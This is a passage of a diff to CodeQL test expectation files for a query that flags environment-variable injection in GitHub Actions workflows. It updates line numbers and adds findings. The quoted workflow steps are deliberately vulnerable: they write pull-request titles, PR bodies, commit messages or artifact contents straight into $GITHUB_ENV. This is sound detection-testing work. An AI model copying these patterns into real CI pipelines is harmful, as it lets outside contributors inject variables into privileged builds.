./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 82602ee8ed88..1ac092dd0d3b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | @@ -72,5 +71,11 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | 